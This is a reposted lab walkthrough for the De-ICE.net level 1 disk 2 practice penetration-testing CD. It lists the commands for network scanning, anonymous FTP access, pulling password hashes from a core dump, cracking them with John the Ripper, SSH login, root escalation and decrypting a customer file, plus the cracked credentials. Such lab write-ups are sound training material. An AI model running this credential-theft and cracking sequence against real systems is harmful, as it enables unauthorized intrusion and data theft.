HOWTO : De-ICE.net v1.1 (1.110) {Level 1 - Disk 2}
*** Do NOT attack any computer or network without authorization or you may put into jail. ***
Credit to : g0tmi1k
This is g0tmi1k's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.
The original post at here
Links
Watch video on-line
Download video
What is this?
This is my walk though of how I broke into the De-ICE.net network, level 1, disk 2.
The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.
What do I need?
BackTrack 4 (Final)
de-ice.net-1.110-1.0.iso (MD5: a626d884148c63bfc9df36f2743d7242)
Dictionary(s)
Software
Name: De-ICE.net
Version: 1.1 (Level 1 - Disk 2 - IP Address: 1.110)
Home Page: http://www.de-ice.net or http://heorot.net/livecds/
Download Link:
http://www.mediafire.com/?tnci5ewmcoyrp8o
http://de-ice.hackerdemia.com/lib/exe/fetch.php?id=start&cache=cache&media=wiki:de-ice_netcat-1.0.iso
http://heorot.net/instruction/tutorials/iso/de-ice.net-1.110-1.0.iso
Forums/Support: http://forums.heorot.net and http://forums.heorot.net/viewtopic.php?f=16&t=13
WiKi/Support: http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks
Commands
nmap -n 192.168.1.1-255
nmap -n -sS -sV -O 192.168.1.110
firefox 192.168.1.110
[+]kate -> make list of possible usernames
// lastF, fLast
ftp 192.168.1.110
// Username: anonymous. Password: [Blank]
ls -a
cd download
ls -a
cd etc
ls -a
get core
exit
strings core
[+]Copy from 'root:$...' to '[EOF]'. Kate -> New -> Paste. Format so each username is one its own line -> Save. Filename: shadow
cd tools/dictionary/
cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords
john
./john --rules --wordlist=/root/passwords /root/shadow
//Password: root:Complexity & ccofee:Diatomaceous
ssh ccofee@192.168.1.110
//Password: Diatomaceous
ls -a
cd ..
ls -a
cd root/
ls -a
cd .save/
su
//Password: Complexity
cd .save/
ls -a
cat copy.sh
openssl enc -d -aes-256-cbc -salt -in customer_account.csv.enc -out customer_account.csv -pass file:/etc/ssl/certs/pw
ls -a
cat customer_account.csv
// GAME OVER
----------------------------------------------------------------------------------------------------
Users
root:Complexity = root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::
aadams: = aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0: 99999:7:::
bbanter:Zymurgy = bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0 :99999:7:::
ccoffee:Diatomaceous = ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::
----------------------------------------------------------------------------------------------------
Notes
Dictionaries: http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html
That's all! See you!